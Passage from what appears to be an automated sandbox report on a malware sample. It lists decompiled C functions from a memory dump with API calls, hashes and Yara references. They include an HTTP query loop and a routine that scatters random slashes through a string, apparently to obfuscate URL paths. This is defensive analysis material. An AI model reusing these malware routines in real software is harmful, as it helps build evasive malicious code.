						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x2f6d138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E02F6147E(_v16);
							if(_t58 == 0) {
								_t58 = E02F616DB(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E02F69D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E02F69D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}

0x02f68f17
0x02f68f1c
0x02f68f1e
0x02f68f23
0x02f68f24
0x02f68f29
0x02f68f2a
0x02f68f35
0x02f68f66
0x02f68f6b
0x02f6902e
0x02f69031
0x02f69037
0x02f69037
0x02f68f78
0x02f68f80
0x02f6902b
0x00000000
0x02f6902b
0x02f68f8b
0x02f68f90
0x02f68f95
0x02f6901d
0x02f6901e
0x02f6901e
0x02f69024
0x00000000
0x02f69024
0x02f68f9b
0x02f68f9d
0x02f68fa3
0x02f68fa4
0x02f68fa4
0x02f68fa7
0x02f68faa
0x02f68fb0
0x02f68fb5
0x02f68fb6
0x02f68fbb
0x02f68fbe
0x02f68fc9
0x00000000
0x00000000
0x02f68fd1
0x02f68fd9
0x02f69002
0x02f69005
0x02f6900c
0x02f69017
0x02f69017
0x00000000
0x02f6900c
0x02f68fe5
0x02f68fe9
0x00000000
0x00000000
0x02f68feb
0x02f68ff0
0x00000000
0x00000000
0x02f68ff2
0x02f68ff2
0x02f68ff7
0x00000000
0x00000000
0x02f68ff9
0x02f68ffa
0x02f68ffd
0x02f68ffd
0x02f68fa4
0x02f68f3d
0x02f68f45
0x02f68f5e
0x02f68f60
0x00000000
0x00000000
0x00000000
0x02f68f60
0x02f68f51
0x02f68f55
0x00000000
0x00000000
0x02f68f5b
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 02F68F1E
GetLastError.KERNEL32 ref: 02F68F37

Part of subcall function 02F69D3A: WaitForMultipleObjects.KERNEL32(00000002,02F6AA33,00000000,02F6AA33,?,?,?,02F6AA33,0000EA60), ref: 02F69D55

ResetEvent.KERNEL32(?), ref: 02F68FB0
GetLastError.KERNEL32 ref: 02F68FCB

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID:
API String ID: 2394032930-0
Opcode ID: 02dd05e3aceb29e246af4a2a9331c6c4a0725ddd3ec03b91ada8c75bdac3dce4
Instruction ID: 4ef6c7d1210ad71d3de8f3c8587a3522c68a773d74f8cd0993aa3befffe33c2a
Opcode Fuzzy Hash: 02dd05e3aceb29e246af4a2a9331c6c4a0725ddd3ec03b91ada8c75bdac3dce4
Instruction Fuzzy Hash: E6319232A00604BFDB219BA4CC48E7EB7BAEF887E0F150528E655D7190DBB0E9469B10

Uniqueness

Uniqueness Score: -1.00%

Function 02F6A1F1, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02F6A1F1(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x2f6d140; // 0x2f6ad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02F658BE(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E02F6147E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02F69D3A( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x02f6a1f1
0x02f6a1f1
0x02f6a1fb
0x02f6a201
0x02f6a204
0x02f6a208
0x02f6a20e
0x02f6a213
0x02f6a22c
0x02f6a22f
0x02f6a233
0x02f6a237
0x02f6a238
0x02f6a23d
0x02f6a240
0x02f6a247
0x02f6a24e
0x02f6a2a1
0x02f6a2a7
0x02f6a2ad
0x02f6a2e8
0x02f6a2ee
0x00000000
0x00000000
0x00000000
0x02f6a2ad
0x02f6a254
0x00000000
0x02f6a25b
0x02f6a269
0x02f6a26c
0x02f6a26f
0x02f6a27b
0x02f6a27f
0x02f6a2e1
0x02f6a281
0x02f6a284
0x02f6a288
0x02f6a289
0x02f6a28a
0x02f6a28c
0x02f6a293
0x02f6a2d1
0x02f6a2dc
0x02f6a295
0x02f6a298
0x02f6a29c
0x02f6a29c
0x02f6a293
0x00000000
0x02f6a27f
0x02f6a254
0x02f6a218
0x02f6a21e
0x02f6a221
0x02f6a226
0x00000000
0x00000000
0x00000000
0x02f6a2b6
0x02f6a2be
0x02f6a2c3
0x02f6a2c6
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 02F6A208
SetEvent.KERNEL32(?), ref: 02F6A218
GetLastError.KERNEL32 ref: 02F6A2A1

Part of subcall function 02F69D3A: WaitForMultipleObjects.KERNEL32(00000002,02F6AA33,00000000,02F6AA33,?,?,?,02F6AA33,0000EA60), ref: 02F69D55

Part of subcall function 02F6147E: RtlFreeHeap.NTDLL(00000000,00000000,02F61D11,00000000,?,?,-00000008), ref: 02F6148A

GetLastError.KERNEL32(00000000), ref: 02F6A2D6

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 674d0dd857fa13efbe96f84072d34e76c7e9cfbe0b0cbcef358ab7155c5fbb14
Instruction ID: daf0237c10e5bd632b8746f0bdd4a89886612da7f8840f81bad831e8868440cc
Opcode Fuzzy Hash: 674d0dd857fa13efbe96f84072d34e76c7e9cfbe0b0cbcef358ab7155c5fbb14
Instruction Fuzzy Hash: AA3122B5D40209FFDB20DFE5C9889AEB7B8FB09384F20496AD652F2140D7719A45DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02F64858, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02F64858(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2f6d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2f6d250; // 0xfefd6a20
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2f6d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02f64860
0x02f64863
0x02f64869
0x02f64881
0x02f64883
0x02f64888
0x02f6488a
0x02f6488d
0x02f6488f
0x02f64892
0x02f64894
0x02f64894
0x02f64896
0x02f648a1
0x02f648a6
0x02f648b7
0x02f648bf
0x02f648c4
0x02f648c7
0x02f648ca
0x02f648cc
0x02f648cf
0x02f648d2
0x02f648d2
0x02f648d5
0x02f648e0
0x02f648e5
0x02f648ef

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02F64DBF,00000000,?,?,02F652FE,?,03AA95B0), ref: 02F64863
RtlAllocateHeap.NTDLL(00000000,?), ref: 02F6487B
memcpy.NTDLL(00000000,?,-00000008,?,?,?,02F64DBF,00000000,?,?,02F652FE,?,03AA95B0), ref: 02F648BF
memcpy.NTDLL(00000001,?,00000001), ref: 02F648E0

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 8099c2fc6a091eb3992540b9c411efdf8361772be7e4ccb349740a5d8e261d32
Instruction ID: 5f685ce7a4ea1140f74f8c87a452164221cb707757aec5ded1c24fdd6d31b54c
Opcode Fuzzy Hash: 8099c2fc6a091eb3992540b9c411efdf8361772be7e4ccb349740a5d8e261d32
Instruction Fuzzy Hash: FB11A3B2E40158AFC7209E69DC8CDAEBBAAEB90690B050166F604D7140E7709E1087A0

Uniqueness

Uniqueness Score: -1.00%

Function 02F66AF7, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E02F66AF7(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E02F66F89(_t8, _t1);
				_t16 = E02F658BE(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E02F69038(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E02F658BE(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E02F6147E(_t16);
				}
				return _t18;
			}

0x02f66b02
0x02f66b03
0x02f66b06
0x02f66b08
0x02f66b13
0x02f66b17
0x02f66b1c
0x02f66b20
0x02f66b28
0x02f66b2d
0x02f66b35
0x02f66b35
0x02f66b3e
0x02f66b42
0x02f66b48
0x02f66b4b
0x02f66b51
0x02f66b51
0x02f66b59
0x02f66b59
0x02f66b60
0x02f66b60
0x02f66b6b

APIs

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

Part of subcall function 02F69038: wsprintfA.USER32 ref: 02F69094

lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,02F62098,74666F53,00000000,?,02F6D00C,?,?), ref: 02F66B2D
lstrcpy.KERNEL32(00000000,00000000), ref: 02F66B51
lstrcat.KERNEL32(00000000,00000000), ref: 02F66B59

Strings

Soft, xrefs: 02F66B03, 02F66B1C

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: d3bc8287817f190ae2f3c1c972f82dfab3f47b57a2bffb7da8dd3d0d78e6ec1c
Instruction ID: 9ca237af3d08ecc3455f6fc70fc1b89e061c435d7e85df8f0aaba0cc16b6c126
Opcode Fuzzy Hash: d3bc8287817f190ae2f3c1c972f82dfab3f47b57a2bffb7da8dd3d0d78e6ec1c
Instruction Fuzzy Hash: B701A23290010ABBCB122AA89C8CEFF7A6DDF857C5F044425FB54E6101DB7985558BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F67283, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F67283(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x02f6728d
0x02f67291
0x02f672a6
0x02f672a8
0x02f672ad
0x02f672b3
0x02f672b5
0x02f672ba
0x02f672c5
0x02f672bc
0x02f672bc
0x02f672bc
0x02f672ba
0x02f672d3

APIs

memset.NTDLL ref: 02F67291
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 02F672A6
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02F672B3
CloseHandle.KERNEL32(?), ref: 02F672C5

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 142619b1ecb1d4e28783fa8cd156fc541be793b3e1c38ee26b3a6d2e9c3a3291
Instruction ID: 62322546cc913cfe784ed44449f27c49aa3998023d0b1c8f95789a904bc87e4e
Opcode Fuzzy Hash: 142619b1ecb1d4e28783fa8cd156fc541be793b3e1c38ee26b3a6d2e9c3a3291
Instruction Fuzzy Hash: E8F0DAB190430CBFD610AF669C88827FBACEB565DCB118D2EF28282511D672A8198E70

Uniqueness

Uniqueness Score: -1.00%

Function 02F6A2EF, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02F6A2EF(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E02F658BE(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}

0x02f6a2f2
0x02f6a2f6
0x02f6a2f8
0x02f6a2fe
0x02f6a302
0x02f6a304
0x02f6a304
0x02f6a306
0x02f6a30f
0x02f6a313
0x02f6a31b
0x02f6a32a
0x02f6a32f
0x02f6a337

APIs

lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,02F69AA8,00000000,00000005,02F6D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 02F6A2F8
memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,02F64A8B,?,?,?,4D283A53,?,?), ref: 02F6A31B
memset.NTDLL ref: 02F6A32A

Strings

S:(M, xrefs: 02F6A2F2

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpymemset
String ID: S:(M
API String ID: 4042389641-2217774225
Opcode ID: be615e1ca6771a73d3f98dc9b38352a8de52c55415f649094b695caddb4bb4ac
Instruction ID: d9288af7a518efe26b5190f76ffd593b32ddc3be65287aa4fcb82bdf711e0776
Opcode Fuzzy Hash: be615e1ca6771a73d3f98dc9b38352a8de52c55415f649094b695caddb4bb4ac
Instruction Fuzzy Hash: 3EE0E5B3E052266BC630A9B85C8CD5F7A9DDBC5790B040865FB55D3204E631CC1886B0

Uniqueness

Uniqueness Score: -1.00%

Function 02F678AD, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F678AD() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2f6d26c; // 0x1d0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2f6d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2f6d26c; // 0x1d0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2f6d238; // 0x36b0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02f678ad
0x02f678b4
0x02f678fe
0x02f67900
0x02f67900
0x02f678b8
0x02f678be
0x02f678c3
0x02f678c7
0x02f678cd
0x02f678d4
0x00000000
0x00000000
0x02f678d6
0x02f678db
0x00000000
0x00000000
0x00000000
0x02f678db
0x02f678dd
0x02f678e5
0x02f678e8
0x02f678e8
0x02f678ee
0x02f678f5
0x02f678f8
0x02f678f8
0x00000000

APIs

SetEvent.KERNEL32(000001D0,00000001,02F66F2D), ref: 02F678B8
SleepEx.KERNEL32(00000064,00000001), ref: 02F678C7
CloseHandle.KERNEL32(000001D0), ref: 02F678E8
HeapDestroy.KERNEL32(036B0000), ref: 02F678F8

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 899b944945caad7122d0731d853e2c5fc12ce9baf50b841810499d24cd355a5a
Instruction ID: 1f95fbb5d9d70e3a5153d890794a1c4a3879f8955e752483b261b53ab99e1d36
Opcode Fuzzy Hash: 899b944945caad7122d0731d853e2c5fc12ce9baf50b841810499d24cd355a5a
Instruction Fuzzy Hash: 8DF01C71F8531AA7DA107A75994CE26FBA9EB05ED97240A21F960D7280CB34C810EA60

Uniqueness

Uniqueness Score: -1.00%

Function 02F64C3A, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02F64C3A(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x2f6d324; // 0x3aa95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2f6d324; // 0x3aa95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x2f6d030) {
					HeapFree( *0x2f6d238, 0, _t8);
				}
				_t14[1] = E02F67C75(_v0, _t14);
				_t11 =  *0x2f6d324; // 0x3aa95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x02f64c3a
0x02f64c3a
0x02f64c43
0x02f64c53
0x02f64c53
0x02f64c58
0x02f64c5d
0x00000000
0x00000000
0x02f64c4d
0x02f64c4d
0x02f64c5f
0x02f64c63
0x02f64c75
0x02f64c75
0x02f64c85
0x02f64c88
0x02f64c8d
0x02f64c91
0x02f64c97

APIs

RtlEnterCriticalSection.NTDLL(03AA9570), ref: 02F64C43
Sleep.KERNEL32(0000000A,?,?,?,02F64A8B,?,?,?,4D283A53,?,?), ref: 02F64C4D
HeapFree.KERNEL32(00000000,00000000,?,?,?,02F64A8B,?,?,?,4D283A53,?,?), ref: 02F64C75
RtlLeaveCriticalSection.NTDLL(03AA9570), ref: 02F64C91

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 5fa8db5ce5a8ac1bf1241decfe469ca278c9a5927b1d84e464ee57b3990cc094
Instruction ID: 6bd5b8550beff8e1f516471966fb99b6888f782a58c72c349cdbab32912c18d7
Opcode Fuzzy Hash: 5fa8db5ce5a8ac1bf1241decfe469ca278c9a5927b1d84e464ee57b3990cc094
Instruction Fuzzy Hash: 4FF01271F41244BBD724AF68DA4DF2AB7E9EF18BC4B054805F6A2C7350D720D860CB29

Uniqueness

Uniqueness Score: -1.00%

Function 02F69B10, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02F69B10() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2f6d324; // 0x3aa95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2f6d324; // 0x3aa95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2f6d324; // 0x3aa95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2f6e845) {
					HeapFree( *0x2f6d238, 0, _t10);
					_t7 =  *0x2f6d324; // 0x3aa95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02f69b10
0x02f69b19
0x02f69b29
0x02f69b29
0x02f69b2e
0x02f69b33
0x00000000
0x00000000
0x02f69b23
0x02f69b23
0x02f69b35
0x02f69b3a
0x02f69b3e
0x02f69b51
0x02f69b57
0x02f69b57
0x02f69b60
0x02f69b62
0x02f69b66
0x02f69b6c

APIs

RtlEnterCriticalSection.NTDLL(03AA9570), ref: 02F69B19
Sleep.KERNEL32(0000000A,?,?,?,02F64A8B,?,?,?,4D283A53,?,?), ref: 02F69B23
HeapFree.KERNEL32(00000000,?,?,?,?,02F64A8B,?,?,?,4D283A53,?,?), ref: 02F69B51
RtlLeaveCriticalSection.NTDLL(03AA9570), ref: 02F69B66

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 23d88276d6063da8b2ad843ff42a00357f0529a7952878b2f71c38df98ecf4d9
Instruction ID: fa5ee04e9f942259466503fc0ef0409b47baad4e8f0afd3f7dd4033f3a0792e3
Opcode Fuzzy Hash: 23d88276d6063da8b2ad843ff42a00357f0529a7952878b2f71c38df98ecf4d9
Instruction Fuzzy Hash: A4F0D474F80205EBEB188F64EA5EF26B7E5EB18BC0B094809EA52C7250C770A960CA10

Uniqueness

Uniqueness Score: -1.00%

Function 02F66B6E, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02F66B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02F658BE(_t2);
				if(_t34 != 0) {
					_t30 = E02F658BE(_t28);
					if(_t30 == 0) {
						E02F6147E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02F6A8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02F6A8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02f66b6e
0x02f66b78
0x02f66b7a
0x02f66b80
0x02f66b80
0x02f66b89
0x02f66b8d
0x02f66b99
0x02f66b9d
0x02f66c11
0x02f66b9f
0x02f66b9f
0x02f66ba3
0x02f66ba8
0x02f66bad
0x02f66bc7
0x02f66bb6
0x02f66bb6
0x02f66bba
0x02f66bbd
0x02f66bc2
0x02f66bc2
0x02f66bcc
0x02f66bf4
0x02f66bfa
0x02f66bfd
0x02f66bce
0x02f66bd0
0x02f66bd8
0x02f66be3
0x02f66be8
0x02f66be8
0x02f66c04
0x02f66c0b
0x02f66c0c
0x02f66c0c
0x02f66b9d
0x02f66c1c

APIs

lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,02F6A006,?,?,?,?,00000102,02F666AF,?,?,00000000), ref: 02F66B7A

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

Part of subcall function 02F6A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02F66BA8,00000000,00000001,00000001,?,?,02F6A006,?,?,?,?,00000102), ref: 02F6A8E0
